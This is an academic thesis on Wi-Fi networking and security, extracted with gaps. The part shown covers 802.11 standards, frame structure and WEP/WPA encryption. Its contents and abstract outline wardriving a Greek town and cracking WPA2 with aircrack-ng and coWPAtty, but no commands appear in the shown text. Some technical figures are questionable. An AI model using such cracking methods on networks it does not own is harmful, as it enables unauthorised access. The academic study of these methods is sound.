Documente Academic
Documente Profesional
Documente Cultură
LOUKAS TRIANTAFYLLOPOULOS
MA COMPUTER SCIENCE
2016
LOUKAS TRIANTAFYLLOPOULOS
MARCONI UNIVERSITY
MARCH 2016
i
ACKNOWLEDGEMENTS
First and foremost, I wish to express my gratitude to my wife and two little sons for their continual
support, not only during the write-up of this dissertation, but also for the entire duration of my MSc
studies.
ii
TABLE OF CONTENTS
ACKNOWLEDGEMENTS ................................................................................................................................ i
LIST OF TABLES & GRAPHS ..........................................................................................................................iv
LIST OF IMAGES ............................................................................................................................................v
LIST OF ABBREVATIONS...............................................................................................................................vi
ABSTRACT.................................................................................................................................................. viii
INTRODUCTION - CHAPTER 1....................................................................................................................... 1
LITERATURE REVIEW ................................................................................................................................... 3
CHAPTER 2 - WIRELESS NETWORKS ............................................................................................................. 3
2.1 About WI-FI ....................................................................................................................3
2.2 About Wireless Networks ...............................................................................................4
2.2.1. Advantages of wireless networks ................................................................................4
2.2.2. Disadvantages of wireless networks ............................................................................6
2.3. Who needs wireless connection .....................................................................................6
2.4 Structural Elements ........................................................................................................7
2.5 Wireless Networking Standards ......................................................................................8
2.6. The 802.11 standard ......................................................................................................9
2.6.1. 802.11 versions ......................................................................................................... 10
2.6.2 Architecture of IEEE 802.11 ........................................................................................ 11
2.6.3. Services of IEEE 802.11 .............................................................................................. 12
2.6.4. IEEE 802.11 Protocol Architecture ............................................................................. 13
CHAPTER 3: SECURITY IN WIRELESS NETWORKS ........................................................................................17
3.1. What is encryption? ..................................................................................................... 17
3.1.1. Symmetric key encryption ......................................................................................... 18
3.1.2. Public key encryption ................................................................................................ 18
3.2. Wireless network encryption protocols ........................................................................ 18
3.2.1. WEP encryption......................................................................................................... 18
3.2.2. WPA encryption (Wi-Fi Protected Access) .................................................................. 19
3.2.3. WPA or WEP ............................................................................................................. 21
3.2.4. WPA2 (Wi-Fi Protected Access Version 2) .................................................................. 21
3.3. Types of Attacks on wireless networks ......................................................................... 22
3.3.1. Passive attacks.......................................................................................................... 22
3.3.2. Active attacks ........................................................................................................... 22
iii
EMPIRICAL PART 1 ......................................................................................................................................23
CHAPTER 4: LOCATION ANALYSIS IN TERMS OFWIRELESS NETWORKS SECURITY.......................................23
4.1. About Wardriving ........................................................................................................ 23
4.2. Wardriving Equipment ................................................................................................. 23
4.2.1. Why a smartphone.................................................................................................... 24
4.2.2.Wigle Wifi Wardriving Android Application ................................................................ 24
4.3. Wardriving analysis in and around central town of Tinos Greek island ......................... 25
4.3.1.Preparation process for analysis of data..................................................................... 27
4.4. Security analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 28
4.5. Channel analysis of wireless networks in and around central town of Tinos Greek Island-
Results................................................................................................................................ 29
EMPIRICAL PART 2 ......................................................................................................................................30
CHAPTER 5: CRACKING SECURITY IN WIRELESS NETWORKS .......................................................................30
5.1. About Linux, a good environment ................................................................................ 30
5.2.About Kali linux, the next generation of Backtrack ........................................................ 30
5.3. Equipment for Cracking Wireless Networks Security .................................................... 31
5.4. Preparation of attack ................................................................................................... 33
5.4.1.Dictionary attack ....................................................................................................... 33
5.4.2. Pre-computed hashes................................................................................................ 33
5.5. TheAircrack-ngsuite ..................................................................................................... 33
5.5.1.About Airmon-ng ....................................................................................................... 34
5.5.2 About Airodump-ng ................................................................................................... 34
5.6. Airolib-ng &Aircrack-ng ................................................................................................ 38
5.7. coWPAtty .................................................................................................................... 39
5.8.genpmk & coWPAtty..................................................................................................... 40
5.9. Comparison of attacks ................................................................................................. 42
CONCLUSIONS ............................................................................................................................................45
BIBLIOGRAPHY ...........................................................................................................................................46
iv
TABLE 1. Wireless networks in and around central town of Tinos Greek island – Security Analysis of
data……………………………………………………………………………………………………..28
TABLE 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data…..……………………………………………………………………………………………….....29
TABLE 3: A comparative table of the results of used in project attacks……………..………………..42
GRAPH 1. Wireless networks in and around central town of Tinos greek island – Security Analysis of
data……………………………………………………………………………………………..…..…..28
GRAPH 2. Wireless networks in and around central town of Tinos Greek island – Channel Analysis of
data….……………………………………………………………………………………………….....29
GRAPH 3. Time taken to crack WPA/WPA2…………………..……………………………………..43
GRAPH 4: Time taken to crack WPA/WPA2 via dictionary attack…………..……………………...43
GRAPH 5: Time to pre-calculated hashes (seconds)………………………..………………………...44
GRAPH 6: Time taken to crack WPA/WPA2 via pre-calculated hashes……………..………………44
v
LIST OF IMAGES
Image 1 – Diagram of a Computer Network......................................................................................... 1
Image 2 - Wi-Fi Alliance logo ............................................................................................................. 3
Image 3- Wi-Fi Certified logo .............................................................................................................. 3
Image 4 - Representation of Ad-hoc mode ......................................................................................... 11
Image 5 - Representation of Infrastructure BSS mode ........................................................................ 11
Image 6 - Infrastructure mode and an ESS ......................................................................................... 12
Image 7 - 802.11 and OSI Model ....................................................................................................... 13
Image 8 - 802.11 MAC Frame Format ............................................................................................... 14
Image 9 - Frame Control Field ........................................................................................................... 15
Image 10 - Sequence Control Field .................................................................................................... 16
Image 11 - A simple Encryption-Decryption system .......................................................................... 17
Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation ................. 19
Image 13 - WPA-PSK mode .............................................................................................................. 19
Image 14 - WPA- Enterprise mode .................................................................................................... 20
Image 15 - WPA implementation (*) ................................................................................................. 20
Image 16 - WPA2 implementation ..................................................................................................... 21
Image 17 - Vodafone Smart 4 Review................................................................................................ 23
Image 18 – Wigle Wifi Wardriving Application at Google Play Store................................................ 23
Image 19 – Wigle Wifi Wardriving Android Application Framework ................................................ 24
Image 20 - Data tab in Wigle Wardriving app .................................................................................... 25
Image 21 - Wireless Networks in and around central town of Tinos Greek Island – Google Earth
view ................................................................................................................................................... 26
Image 22 - Wardriving followed paths in and around central town of Tinos Greek Island – Google
Earth view ......................................................................................................................................... 26
Image 23 - Step 1 preview ................................................................................................................. 27
Image 24 - Step 2 preview ................................................................................................................. 27
Image 25 - Uniformly classified data of CSV file ............................................................................... 27
Image 26 - Table of data after the right modification.......................................................................... 28
Image 27 -Tux the penguin, mascot of Linux ..................................................................................... 30
Image 28 - Kali Linux logo ................................................................................................................ 31
Image 29 - Samsung R530 preview .................................................................................................... 32
Image 30 - HP Compaq 610 preview ................................................................................................. 32
Image 31 - Huawei Echolife HG520c preview ................................................................................... 32
Image 32 - The wireless card in monitor mode ................................................................................... 34
Image 33 - Collection of Initialization Vectors (IVs) .......................................................................... 35
Image 34 - "Concept" of the handshake packet .................................................................................. 36
Image 35 - "Concept" of the handshake packet .................................................................................. 36
Image 36 - Aircrack-ng in process ..................................................................................................... 37
Image 37 - Aircrack-ng in process ..................................................................................................... 37
Image 38 - Attack using database ....................................................................................................... 38
Image 39 - Attack using database ....................................................................................................... 38
Image 40 - CoWPAtty in process ....................................................................................................... 39
Image 41 - CoWPAtty in process ....................................................................................................... 39
Image 42 - Preparation with genpmk .................................................................................................. 40
Image 43 - Preparation with genpmk .................................................................................................. 41
Image 44 - Attack using pre-computed hashes .................................................................................. 41
Image 45 - Attack using pre-computed hashes .................................................................................. 42
vi
LIST OF ABBREVATIONS
AP (Access Point): A router, switch or hub device that manages multiple wireless connections to a
network.
Ad hoc: The mode in which a computer can be connected to one another to form a network directly,
without the interposition of an AP.
ARP: (Address Resolution Protocol): a network layer protocol used to convert an IP address into a
physical address (called a DLC address), such as an Ethernet address.
Authenticator: The device that initiates the connection of a station with an another or with a network
(typically an AP).
Beacon: Small, often inexpensive device that enables more accurate location within a narrow range
than GPS, cell tower triangulation and Wi-Fi proximity.
EAP (Extensible Authentication Protocol): is a general protocol for authentication that also supports
multiple authentication methods, such as token cards, Kerberos, one-time passwords, certificates, public
key authentication and smart cards.
Fragmentation: The process in which an information packet breaks up into smaller packets when
sending and which will be linked at their destination.
Frame: We can consider that “frame” is the same as a packet. The "definition" is that when there is a
message exchange in layer 2 of the OSI model we refer it as to frames, and when the message exchange
is made in layer 3we refer to it as packets.
Handshake: Process of a series of questions and answers for the purpose of the identification of
supplicant.
ICV (Integrity Check Value): A checksum capable of detecting modification of an information system
(IS).
Infrastructure: The mode of operation in which a computer is connected at first to an AP and then to
the network.
IV (Initialization Vector): a non-secret binary vector used as the initializing input algorithm for the
encryption of a plaintext block sequence to increase security by introducing additional cryptographic
variance and to synchronize cryptographic equipment.
vii
KCK (Key Confirmation Key): integrity control key that protects the handshake messages.
KEK (Key Encryption Key): encrypted key that protects the handshake messages.
MAC Address (Media Access Control Address): is a 48-bit-long address that uniquely identifies each
physical machine on an Ethernet local area network.
MIC (Message Integrity Code): data field appended to the plaintext for checking the integrity
(generated by the Michael algorithm).
MK (Master Key): Within a hierarchy of encrypting keys and transaction keys, the
highest level of key-encrypting key.
Monitor Mode: The operational mode of a Wi-fi device which receives packets circulating on the Wi-
Fi network. Also known as raw mode.
Packet: a sequence of binary digits, including data and control signals, that is transmitted and switched
as a composite whole.
PMK (Pairwise Master Key): master key in the pairwise key hierarchy.
PRGA (Pseudo Random Generation Algorithm): the production process of the key stream on RC4.
PSK (Pre-Shared Key): key generated by a password replacing a PSK on WPA-PSK mode.
Rainbow Tables: prepared word hashes for use in brute force or dictionary attacks.
TKIP (Temporal Key Integrity Protocol): encryption protocol used in WPA and based on RC4
algorithm (which also used in WEP).
TMK (Temporary MIC Key): key for data integrity on unicast traffic (TKIP).
WEP (Wired Equivalent Privacy): default encryption protocol that is used on 802.11 networks.
Wi-Fi (Wireless Fidelity):the well known wireless technology.
WPA, WPA1 (Wi-Fi Protected Access): The initial version of WPA, sometimes called WPA1, is
essentially a brand name for TKIP. TKIP was chosen as an interim standard because it could be
implemented on WEP hardware with just a firmware upgrade.
WPA2: The trade name for an implementation of the 802.11i standard, including AES and CCMP
viii
ABSTRACT
The purpose of this thesis is to describe the way wireless networks work, as well as their encryption
protocols and addresses the threat of security violations. More precisely, all active wireless networks
within and around central town of Tinos Greek island will be searched for and registered through the use
of specific functions and the WiGLE android application. Dictionary and precomputed hashes attacks
will be created and finally the security of an encrypted WPA/WPA2 wireless network will be violated.
More specifically, chapter two describes the human need for remote communication, the definition,
the architecture, the categories that wireless networks are divided into and the differences between
wireless and wired networking.
Chapter two also describes the advantages and disadvantages in using wireless networks, analyzes
wireless devices being used and describes wireless networking standards. Moreover, it gives the analysis
of publications and architecture of the standard 802.11.
Chapter three refers to the types of encryption algorithms, describes and compares in detail the
encryption protocols WEP and WPA/WPA2 and analyzes two types of attacks.
Chapter four refers to the first empirical part of this thesis, about location analysis in terms of
wireless networks security in and around central town of Tinos Greek island. The analysis of the
extracted CSV file presents statistical information about cryptographic methods and the channels in use.
Chapter five describes the violation of wireless security. It presents in detail the tools used for
searching, registrating and violating wireless networks. Based on the statistics from the first empirical
part of this thesis, a wireless network SSID with the most common cryptographic method (WPA2) is
analyzed using some powerful security attacks. The effects of the attacks will be compared and the
results will be analyzed in detail.
INTRODUCTION - CHAPTER 1
From the beginning of time, the need for communication regarding the exchange of information has
been a viral asset for survival. However, the element of flexibility was achieved only in the 20th century
with the advent of remote communication. The invention and use of telephones, televisions, radio signals
and generally computer networks are those elements which have contributed to the particularly rapid
growth of remote communication.
A computer network is a communication data system that connects two or more computers to each
other and to other remote devices. The term “connect” refers to the ability of exchanging information.
A computer network consists of the following components:
Terminal Nodes: This component checks the network resources (hardware and software)
Sub-Networks: Physical means, communication protocols, typology, terminal nodes, resources
that differ among different sub-networks.
Interface devices: These devices connect heterogeneous sub-networks in order to achieve
successful communication of terminal nodes which are located in different sub- networks.
Source: www.conceptdraw.com
[1]
but electromagnetic waves with frequency usually of 2,4GHz and 5 GHz. For normal communication
between wired and wireless networks, it’s important to use specific standards.
As Switched network is called a physical network in which an infrastructure device (called a switch)
directs packets based on their destination. This improves network performance by ensuring that only the
hosts that need to receive a given packet actually see it. In other hand, as shared network is called a
network in which every packet is received by every device on the network.
Wireless communication is, undoubtedly, the fastest growing segment of the communications
industry. Mobile telephones and satellite communications are characteristic examples of wireless services
with the most rapid expansion worldwide and are important tools for the development of countries.
[2]
LITERATURE REVIEW
Source: commons.wikimedia.org
The Wi-Fi Alliance organization has established a test suite that defines how member products will be
tested by an independent test lab. Products that pass these tests are entitled to display the Wi-Fi
trademark, which is a seal of interoperability. These Wi-Fi interoperability tests are designed to ensure
that hardware from different vendors can successfully establish a communication session with an
acceptable level of functionality.
Source: www.wi-fi.org
[3]
This trademark is a certification for any prospective buyer of a device and a guarantee of its use.
The consumer buying a device with this logo, has the warranty that this device will work with every other
device that also has the same trademark.
[5]
i) Health and safety
Because there are no wires involved with a wireless connection, the potential risk of tripping over any
trailing cables that wired connectivity requires, can be avoided altogether.
a) Security
To combat this consideration, wireless networks may choose to utilize some of the various
encryption technologies available. Some of the more commonly utilized encryption methods, however,
are known to have weaknesses that a dedicated adversary can compromise.
b) Range
The typical range of a common 802.11g network with standard equipment is on the order of tens of
meters. While sufficient for a typical home, it will be insufficient in a larger structure. To obtain
additional range, repeaters or additional access points will have to be purchased. Costs for these items
can add up quickly.
c) Reliability
Like any radio frequency transmission, wireless networking signals are subject to a wide variety of
interference, as well as complex propagation effects that are beyond the control of the network
administrator.
d) Speed
The speed on most wireless networks (typically 1-54 Mbps) is far slower than even the slowest
common wired networks (100Mbps up to several Gbps). However, in specialized environments, the
throughput of a wired network might be necessary.
e) Electricity Consumption
Wifi Routers consume more electricity as compared to Broadbands. The Electricity is consumed to
spread Wifi Signals over the Area of 40 Meter.
A wireless network has many features. During the last decades wireless networks have been used in
applications on various categories such as educational applications, professional or household
applications.
Some important features of wireless networks are:
1. With a wireless network it is very easy to share Internet connection from all Wi-Fi devices.
[6]
2. If a company occupies more than one building, there is legitimate communication between their
networks. The use of wireless switching is the most simple and economical solution, with the only
disadvantages being a possible security breach.
3. In conference rooms (meeting rooms) it is possible to access information from the corporate
network.
4. Hot spots: Aside from the internal network, a company can expand its customer base, thus its
profits, offering various services at selected locations on its premises. Such places can found in
restaurants, cafés, hotels, airports, hospitals, railway stations, etc.
5. Doctors and nurses use wireless handheld devices to have direct access to personal files of patients
and to medical libraries.
6. Implementation of networks is possible in old buildings where the wiring is unprofitable or
restrictive.
7. Implementation of wireless networks as a backup of wired systems installations.
[7]
v) Antennas
Antenna is a device that allows the effective transmission and reception of radio waves, based on
the phenomenon of electromagnetic induction. When an antenna operates as a receiver, it receives radio
waves and converts them to AC power. On the other hand, when antenna operates as a transmitter, it
takes AC and converts it respectively to radio waves.
Antennas can be broadly classified as omnidirectional and directional antennas, depending on the
directionality.
Omnidirectional antennas are most commonly are used to create hot spots by transmitting a signal
over a large area in all directions or receiving signals in all directions when the transmitting location is
unknown or close by. Omni Wi-Fi antennas do not need to be pointed in a particular direction since their
radiation cone is 360 degrees, working in all directions.
Directional antennas as the name implies refers to signal coverage in a specified direction. Unlike
omnidirectional antennas, directionals must be aimed in the direction of the signal transmitter or receiver
which can be for example a router or Wi-Fi hotspot. When it comes to aiming the antenna the user must
be right on the signal for the best strength and quality.
In 2003, the IEEE adopted the standard known as 802.16 WiMAX to satisfy the requirements for
wireless broadband access (steadily) and high speed over a long distance. As with the standards of the
series 802 for wireless LANs, so the 802.16 defines a family of standards with options for specific
settings. Conversely with other wireless networks that allow transmission with only one range frequency,
the WiMAX allows data transfer using multiple frequencies. It operates in the frequency range of 10 - 66
GHz and it has data transfer rate 120 Mbps.
1
For more information : en.wikipedia.org/wiki/IEEE_802.11
2
For more information: en.wikipedia.org/wiki/IEEE_802.11
3
For more information: en.wikipedia.org/wiki/HiperLAN
4
For more information: www.labs.hpe.com/personal/Jean_Tourrilhes/Linux/Linux.Wireless.std.html
5
For more information: en.wikipedia.org/wiki/HomeRF
6
For more information: en.wikipedia.org/wiki/Bluetooth
[8]
A significant difference of the IEEE 802.16 in relation to IEEE 802.11 is that the former can be used
with much lower data rates of 50 Mbps.
B) Openair standard
OpenAir was an early wireless standard promoted by the Wireless LAN Interoperability
Forum implemented predominantly by Proxim Wireless devices. It operated in the 2.4GHz ISM band and
used frequency hopping with 0.8 and 1.6 Mbit/s bit rates via 2 or 4 bits per symbol /* modulation. The
protocol used is CSMA / CA and based on the exchange RTS / CTS packets.
C) Hiperlan standard
The HiperLan is a standard for wireless networking in frequency band 5.1 – 5.3 GHz and developed
in 1996 by the ETSI (European Telecommunications Standards Institute).
There are the following four versions:
1. HiperLan / 1
2. HiperLan / 2,
3. HiperAccessand
4. HiperLink
Due to competition from IEEE 802.11, which was simpler to implement and as a result made it faster
to market, HiperLAN never received much commercial implementation. Much of the work on
HiperLAN/2 has survived in the PHY specification for IEEE 802.11a, which is nearly identical to the
PHY of HiperLAN/2. HIPERACCESS was intended as a last-mile technology. HIPERLINK was
intended as a short-range point-to-point technology at 155 Mbit/s.
D) HomeRF SWAP standard
HomeRF was a wireless networking specification for home devices. It was developed in 1998 by the
Home Radio Frequency Working Group, a consortium of mobile wireless companies that
included Proxim Wireless, Intel, Siemens AG, Motorola, Philips and more than 100 other companies.
The SWAP model has an operating frequency of 2.4 GHz, It uses the technique FHSS, with transmission
rates of 1 and 2 Mbps.
E) Bluetooth standard
Bluetooth is a wireless technology standard for exchanging data over short distances from fixed and
mobile devices, it also builds personal area networks (PANs). Invented by telecom vendor Ericsson in
1994, it was originally conceived as a wireless alternative to RS-232 data cables. It can connect several
devices, overcoming problems of synchronization. It uses the technique FHSS, with operating frequency
2.4 GHz, with a range of up to 200 m and data rate that reaches 3 Mbps.
[9]
2.6.1.802.11 versions
Since the original version, the standard has been implemented in various publications, defined by
letters.
802.11a and 802.11h: The 802.11a extension to 802.11 was developed to make use of the lower
part of the 5 GHz band. The standard has a maximum bit rate of 54 Mbit/s using OFDM. The
allocation in the 5 GHz band for RLAN was later extended. The 5 GHz band ranging from 5150-
5350 and from 5470 - 5725 MHz can be used nowadays in most parts of the world. However,
equipment has to detect and avoid radar systems that use the band and need to have transmit
power control. The 802.11h standard was developed to cater for these provisions.
802.11b: The IEEE 802.11 standard became popular after the publication of the 802.11b
extension in 1999. This extension to the original standard provides a maximum bit rate of 11
Mbit/s. The bit rate will be decreased to 5.5, 2 or 1 Mbit/s if the link quality decreases. The
802.11b standard uses direct sequence spread spectrum coding.
802.11e: The IEEE 802.11e standard provides a set of Quality of Service features including
priority of data streams. This standard is mainly of relevance for time critical applications, such as
voice and streaming multimedia.
802.11f (cancelled): IEEE 802.11f was a recommendation to ease handovers between access
points of different firms. The recommendation is withdrawn.
802.11g : The 802.11g standard was a further development of the standard to improve the bit rate
if the link quality allows. The maximum bit rate is 54 Mbit/s. This bit rate can only be achieved if
the user is in the vicinity of the access point.
802.11i:IEEE 802.11i enhances authentication and encryption. The original standard included
WEP (Wired Equivalent Privacy) which proved to be vulnerable. The improved version in IEEE
802.11i is commonly known as WPA2. An intermediate version called WPA (Wi-Fi Protected
Access) was introduced after the security issues with WEP were shown. WPA uses a subset of
IEEE 802.11i.
802.11j: IEEE 802.11j is an amendment to the IEEE 802.11 standard for the Japanese market. It
allows Wireless LAN operation in the 4.9 to 5 GHz band.
802.11k:IEEE 802.11k is an amendment to the standard for radio resource management. It allows
exchange of radio and network information. This information can be used by the client to switch
to the best available access point.
802.11n: IEEE 802.11n is a standard that further improves the data throughput. The throughput is
increased to a maximum net bit rate of 600 Mbit/s. This through put is achieved by using more
than one channel (channel bonding) and advanced antenna technology (MIMO).
802.11r: IEEE 802.11r adds support for roaming to the standard. This makes seamless
handovers possible in larger areas with WiFi coverage.
802.11s: IEEE 802.11s defines how traffic can be delivered over self-configuring multi-hop
topologies to create a WLAN mesh network.
802.11z: IEEE 802.11z is a mechanism to directly transfer data between two Wi-Fi clients that are
part of the same Wi-Fi network.
802.11ac: IEEE 802.11ac Gigabit Wi-Fi is specifically designed to increase the bit rate in the 5
GHz band. This band offers more channels with a better separation than the 2.4 GHz band. IEEE
802.11ac makes channel bonding possible up to a channel width of 80 MHz, and even 160 MHz
under certain conditions. IEEE 802.11ac further uses MIMO and more efficient data encoding
mechanisms to increase the maximum bit rate up to 6.93 Gbit/s under certain specialized
conditions.
[10]
802.11ad: IEEE 802.11ad is specifically designed for use in the unlicensed 60 GHz band. In this
band is far more overall bandwidth available than in the 2.4 and 5 GHz band. The development of
the standard started in the Wireless Gigabit Alliance (WiGig), but their work is now moved into
the IEEE 802.11ad specification.
802.11af : IEEE 802.11af is an amendment that uses white spaces in the TV bands. It is also
known as White-Fi.
Source: www.techtolink.com.hk
Infrastructure BSS
Infrastructure wireless networks vary from the ad-hoc, because of the use of access points. In
infrastructure mode, a base station acts as a wireless access point hub, and nodes communicate through
the hub. The hub usually, but not always, has a wired or fiber network connection, and may have
permanent wireless connections to other nodes.
Source: ardidudidam.blogspot.com
[11]
The use of access point provides two significant advantages:
The radius of the BSS service area determined by the distance from the access point. This means
that each station is sufficient if it is in range of the access point.
The structure of the Infrastructure BSS enables network management from a central node and
provides great flexibility in security. This is due to the existence of a central node in the network
and the way in which a wireless station is connected to the access point to communicate with the
rest of the network.
Source: technet.microsoft.com
The Distribution System (DS) is the component of the architecture that interconnects BSS. The
connection is achieved by connecting the access points of the BSS together via a network trunk. This
solution enables communication of wireless stations located in different BSS, as well as the migration
from one BSS to another without interrupting the communication. Of course, this can only be done
provided that there are no gaps in coverage between BSS.
Distribution: A station uses the distribution service every time it sends MAC frames across a distribution
system. The 802.11 standard does not specify how the distribution system delivers the data. The
distribution service provides the distribution system with only enough information to determine the
proper BSS destination.
Integration: Because the characteristics of the distribution system are unspecified by the IEEE 802.11
standard, integration is needed. The integration service enables the delivery of MAC frames through a
portal between a distribution system and a non-802.11 LAN. The integration function performs all
required media or address space translations. The details of an integration function depend on the
distribution system implementation and are beyond the scope of the 802.11 standard.
Delivery of MSDU: The delivery of MAC Frames (MAC Service Data Unit) to their final destination.
[12]
Association: Each station must initially invoke the association service with an access point before it can
send information through a distribution system. The association maps a station to the distribution system
via an access point. Each station can associate with only a single access point, but each access point can
associate with multiple stations. Association is also a first step to providing the capability for a station to
be mobile between BSSs.
Reassociation: Enables an association that's been restored to be transferred from one access point to
another, allowing a mobile station to move from one BSS to another, while retaining the connection to
the network.
Disassociation: A station or access point may invoke the disassociation service to terminate an existing
association. This service is a notification; therefore, neither party may refuse termination. Stations should
disassociate when leaving the network. An access point, for example, may disassociate all its stations if
being removed for maintenance.
Authentication: It is used to verify the identity of the stations between them. In a wired network, it is
generally considered that access to physical connection transferring the right of network connectivity. In
wireless networks, the physical connection is achieved simply by having an antenna properly
coordinated. For this reason, the authentication service uses the stations for verification of their identity.
Deauthentication: This service is used when an existing certification is terminated.
Privacy: It is used to prevent the reading of the contents of messages from stations, other than the
intended recipient. This standard allows the optional use of encryption to ensure protection.
Source: technet.microsoft.com
The physical layer defines how to transmit and receive signals. The Data link layer of the OSI
model is subdivided into two sublevels, the Medium Access Control (MAC) and the Logical Link
Control (LLC). The MAC sublayer defines how to access the transmission medium and the reliability of
data transmission. Finally, the LLC sublayer is a connecting plane, which is shared at all IEEE LAN
standards.
[13]
The MAC sublayer is responsible for controlling the following functions:
Controlling access stations in the transmission medium
The mode of fragmentation and reassembly
The operation of the relay packet (packet retransmission)
The function of a positive acknowledgment.
In architecture of MAC sublayer specifies two access methods:
Distributed Coordination Function (DCF)
Point Coordination Function (PCF)
We observe that the DCF mode is the basic method because it works as a basis for the PCF, allowing
implementing a polling algorithm trying to ensure better QoS.
Distributed coordination function (DCF) is the fundamental MAC technique of the IEEE
802.11 based WLAN standard. The DCF method is the basic method used for support on asynchronous
data transfer. As defined in the standard, all stations must support the DCF method. Its operation is based
on the Protocol Carrier Sense Multiple Access with Collision Avoidance (CSMA / CA). The DCF
method does not support any detection mechanism of conflicts, such as CSMA / CD, because the
detection of conflict is not practical in a wireless network. For transmission the station should monitor the
physical medium to ascertain if another station is transmitting. In wired networks to monitor the channel
is very easy to do because all nodes are connected to a common cable and can communicate with each
other. Contrary to wireless networks transceiver each station has a limited scope and can communicate
directly only with the neighboring stations. The Communication with more remote stations is carried out
using other intermediate which is able to promote the package to the final destination. To be able to
follow the Channel exchanged specially checkboxes Request to Send (RTS) and Clear to Send (CTS)
between sender and receiver. This mechanism controlling the physical medium to reduce the probability
to occur packet collision. The exchange is done after checking the availability medium and just before
sending the data. Improves reliability in networks with many stations, where the probability of collisions
is increased.
Point coordination function (PCF ) is a Media Access Control (MAC) technique used in IEEE 802.11
based WLANs. It is an alternative method that operates a level above the DCF method, because the
access method rotated for some time, the PCF is used for the rest is used DCF. It requires the existence of
a central station (Point Coordinator) who assumes centralized management of emissions on other
stations. The Point Coordinator asks all stations cyclically whether they have data to send and can emit
only if it’s allowed.
The devices used in wireless networks communicate by sharing frameworks in sublayer MAC. The
formatting frames 802.11 shown below.
Source: technet.microsoft.com
[14]
The MAC frame consists of the header with length 30 bytes, from frames of variable length and the
frame FCS with length 4 bytes.
Frame Control Field
This field is important because it states the type of frame and provides control information.
Source: technet.microsoft.com
It consists of 11 subfields, which are important for security mechanisms of 802.11 and are the following
below.
Protocol version: Indicates the version of 802.11 MAC contained into frame.
Type: Determines the three frame types, control frames, data frames and management frames.
Subtype: subdivides each of the basic types of framework, in some subtypes.
To DS: This bit is set to 1 when a data frame intended for the distribution system.
From DS: This bit is set to 1 when a data frame leaves the distribution system.
More fragments: The field has a value of 1 when after follow this and other sections.
Retry: If a value of 1, the frame is retransmitted.
Power Management: Identifies the state station of power management. If the value is 1, the station
emits is in sleep (sleep mode).
More Data: Indicates that a station has stored and other data to be sent. Each Data blocks may be
transmitted as a frame or as a group parts in multiple contexts.
Protected frame (WEP): The frame is called the original WEP standard802.11. With version
802.11i changed name and declares on the honor1 in that the body of the frame is encrypted with a
security protocol.
Order: If it has a value of 1 indicates that the service is used the Compliance Series (strictly
ordered).
Duration/ID Field
This field is used for all control type frames, except with the subtype of Power Save (PS) Poll, to indicate
the remaining duration needed to receive the next frame transmission. When the sub-type is PS Poll, the
field contains the association identity (AID) of the transmitting STA.
Address Fields
Depending upon the frame type, the four address fields will contain a combination of the following
address types:
BSS Identifier (BSSID). BSSID uniquely identifies each BSS. When the frame is from an STA
in an infrastructure BSS, the BSSID is the MAC address of the AP. When the frame is from a
STA in an IBSS, the BSSID is the randomly generated, locally administered MAC address of the
STA that initiated the IBSS.
[15]
Destination Address (DA). DA indicates the MAC address of the final destination to receive the
frame.
Source Address (SA). SA indicates the MAC address of the original source that initially created
and transmitted the frame.
Receiver Address (RA). RA indicates the MAC address of the next immediate STA on the
wireless medium to receive the frame.
Transmitter Address (TA). TA indicates the MAC address of the STA that transmitted the
frame onto the wireless medium.
Sequence Control
This field contains two subfields, the Fragment Number field and the Sequence Number field.
Source: technet.microsoft.com
Sequence Number indicates the sequence number of each frame. The sequence number is the same for
each frame sent for a fragmented frame; otherwise, the number is incremented by one until reaching
4095, when it then begins at zero again.
Fragment Number indicates the number of each frame sent of a fragmented frame. The initial value is
set to 0 and then incremented by one for each subsequent frame sent of the fragmented frame.
Frame Check Sequence
The transmitting STA uses a cyclic redundancy check (CRC) over all the fields of the MAC header and
the frame body field to generate the Frame Check Sequence value. The receiving STA then uses the same
Cyclical Redundancy Check (CRC) calculation to determine its own value of the Frame Check Sequence
field to verify whether or not any errors occurred in the frame during the transmission.
[16]
CHAPTER 3: SECURITY IN WIRELESS NETWORKS
The advantages of the use of wireless networks are numerous. Data moving through the network is
transmitted using radio frequencies. This allows anyone to connect to the network. This immediately
created the need for network security. Trust, integrity, certification and availability of exchanged
information, now bounded by the encryption protocols, which were based on already known
cryptographic methods, thus inheriting whatever drawbacks and benefits existed from other
implementations of modern cryptography.
Source: msdn.microsoft.com
[17]
The encryption and decryption of a message is done using an algorithm and an encryption key. Usually
the algorithm of encryption is known, so that the confidentiality of the encrypted message transmitted is
based mostly on the privacy of the encryption key.
[18]
Image 12- Standard WEP Encryption Process using RC4 algorithm with XOR operation
Source: resources.infosecinstitute.com
It is a symmetric encryption algorithm with length of 64 or 128 bit, which generates a pseudo random bit
sequence of, associated to the device in encrypted text (cipher text) with the known XOR function in
order to generate the cipher text. The encrypted text generated using 24 bit of the Initialization Vector
and the encryption key (pre-shared key) entered by the user, with length 40 or104 bit. The result is
inserted in an XOR gate with the original text(plain text) to build up the final encrypted text.
Validation ensured by controlling packets. The algorithmCRC32 has been developed to detect, identify
and often times corrects errors during transmission of packets.
Source: www.tp-link.us
WPA-Enterprise. This mode provides the security needed for wireless networks in business
environments. It is more complicated to set up, and it offers individualized and centralized control
over access to your Wi-Fi network. When users try to connect to the network, they need to present
their login credentials.
[19]
Image 14 - WPA- Enterprise mode
Source: www.tp-link.us
This mode supports 802.1x RADIUS authentication and is appropriate in the cases where
a RADIUS server is deployed. WPA-Enterprise should only be used when a RADIUS server is
connected for client authentication.
The existence of RC4 ensures compatibility with previous versions of wireless networking products. In
addition, WPA introduces a new Temporal Key Integrity Protocol (TKIP), which dynamically takes over
the renewal of keys during the connection. To reduce the repetition rate of the same key is used one
number sequence per broadcast package, a pre-shared key and the transmitted MAC address.
The initialization vector is added to the new generated key and then a new key stream is generated. To
enhance integrity of the packages has added a control field of the integrity of data, the MIC (Message
Integration Check). The value of the MIC is calculated by the cryptographic algorithm “Michael” and
protects the message and addresses of the sender and recipient. A further feature is that it supports a
special mechanism that detects any attempted violation of TKIP, thereby blocking communication.
The authentication to the encryption protocol WPA-Personal or WPA- PSK is designed for professional
and home use. With this method user authentication is done via the Access Point using a phrase 8 to 63
[20]
ASCII characters. When the ASCII characters are selected, one hash function assumes a reduction of
504-bit (63characters * 8bit) to 256-bit.
Subsequently the access point to the station provides a temporary key which is updated at regular
intervals. The 256-bit key is calculated using the hash function PBKDF2using the original code as a key.
WPA and WEP encryption protocols use the RC4 encryption algorithm. However, WEP uses
